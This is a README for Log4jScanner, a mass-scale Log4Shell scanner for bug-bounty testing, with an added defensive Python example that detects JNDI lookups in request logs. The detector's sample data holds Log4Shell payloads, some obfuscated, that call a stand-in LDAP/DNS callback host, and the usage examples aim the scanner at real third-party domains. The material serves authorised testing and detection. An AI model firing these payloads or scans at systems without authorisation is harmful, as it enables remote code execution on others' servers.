Log4jScanner 1.2
Log4jScanner
Log4jScanner is a scanner for Log4j-related CVEs, designed to help penetration testers perform black-box testing on given subdomains.
Disclaimer
This project was created only for good purposes and personal use.
THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
Features
Fast & MultiThreaded
Scan for Log4j RCE (CVE-2021-44228, CVE-2021-45046)
Over 30 Obfuscated Log4j Payloads
Mainly Designed for Mass Scale Bug Bounty
Available Scan Type: Basic Scan & Full Scan
In Basic Scan, only 1 basic Log4Shell payload is used for testing the web app
In Full Scan, all available Log4Shell payloads are used
Log4jScanner fuzzes all the potential endpoints, such as:
HTTP Headers
GET Based Parameter + Without Malicious Headers
POST Based Parameter with JSON Body + Without Malicious Headers
POST Based Parameter with Post Parameters + Without Malicious Headers
GET Based Parameter + With Malicious Headers
POST Based Parameter with JSON Body + With Malicious Headers
POST Based Parameter with Post Parameters + With Malicious Headers
Log4jScanner also tries to fuzz possible POST parameters such as the following.
Feel free to add/remove any POST parameter:
["username", "user", "email", "email_address", "password", "id", "action", "page", "q", "submit", "token", "data", "order", "lang", "search", "redirect", "country", "hidden"]
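For defenders reviewing traffic from a scan like this, the following added example (not part of Log4jScanner) checks every header and parameter value in a request record for a string that reduces to a JNDI lookup, including URL-encoded and nested-lookup forms. The record layout, the function names and the sample values are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote_plus

INNER = re.compile(r"\$\{([^${}]*)\}")           # innermost ${...} with no lookup nested inside
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

def _resolve(match):
    """Reduce one innermost lookup, approximating Log4j 2 substitution."""
    body = match.group(1)
    low = body.lower()
    if low.startswith(("lower:", "upper:")):
        return body.split(":", 1)[1]             # case ignored: JNDI is matched case-insensitively
    if not low.startswith("jndi:") and ":-" in body:
        return body.split(":-", 1)[1]            # ${anything:-default} -> default
    return "\x00{" + body + "}"                  # unresolved: mask "$" so it is not matched again

def normalize(value):
    """URL-decode (up to double encoding), then collapse nested lookups."""
    for _ in range(2):
        value = unquote_plus(value)
    while True:
        reduced = INNER.sub(_resolve, value)
        if reduced == value:
            return value.replace("\x00", "$")
        value = reduced

def find_lookups(requests):
    """Return (request id, location, field) for each value that reduces to a JNDI lookup."""
    hits = []
    for req in requests:
        for location in ("headers", "params"):
            for name, value in req.get(location, {}).items():
                if JNDI.search(normalize(str(value))):
                    hits.append((req["id"], location, name))
    return hits

# Constructed sample records (not from the page); hosts use the reserved .invalid TLD.
SAMPLE_REQUESTS = [
    {"id": "r1", "headers": {"User-Agent": "Mozilla/5.0"}, "params": {"q": "shoes"}},
    {"id": "r2", "headers": {"X-Api-Version": "${jndi:ldap://cb.example.invalid/a}"}, "params": {}},
    {"id": "r3", "headers": {}, "params": {"username": "%24%7B%24%7Blower%3Aj%7Dndi%3Adns%3A%2F%2Fcb.example.invalid%2Fa%7D"}},
    {"id": "r4", "headers": {}, "params": {"search": "${${::-j}ndi:ldap://cb.example.invalid/a}"}},
    {"id": "r5", "headers": {}, "params": {"data": "total is ${amount}"}},
]

if __name__ == "__main__":
    for hit in find_lookups(SAMPLE_REQUESTS):
        print(hit)
```

Because the parameter list above is editable, the check walks every field in the record instead of a fixed set of names; a plain template string such as the one in `r5` is not reported.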
Prerequisite
Python 3.X
Installation
Install Python 3 on your system (Python comes preinstalled on Linux and macOS). This Python module is OS independent, so you can install it with either of these pip commands:
$ python3 -m pip install Log4jScanner
OR
$ pip3 install Log4jScanner
Usage
Type log4jscanner -h for the help menu.
Only the --url-list or --url flag is mandatory.
You can also import this module in your code:
from log4jscanner import Log4jScanner
# test = Log4jScanner.Log4jScanner(file_containing_urls, url_list, ThreadNumber, timeout, custom_dns_callback_host, dns_callback_provider, disable_redirect, exclude_user_agent_fuzzing, basic_scan, file_containing_headers)
# Available headers file paths: db/headers-large.txt, db/headers-minimal.txt, db/headers.txt
# Or you can give the full path of a file containing HTTP request headers
test = Log4jScanner.Log4jScanner("", ["https://google.com"], 30, 30, "", "interact.sh", False, False, False, "db/headers.txt")
# start() returns the list of URLs reported as vulnerable
vuln_url_list = test.start()
for url in vuln_url_list:
    print(url)
Usage Example
# Basic Recon (Passive Subdomain Enumeration)
$ subfinder -d bugcrowd.com -nC -silent -o subdomains.txt && cat subdomains.txt | httpx -nc -silent > httpx_subdomains.txt
$ log4jscanner -m httpx_subdomains.txt
License
This project is licensed under the GNU License (see the LICENSE file for details).
For personal and professional use. You cannot resell or redistribute these repositories in their original state.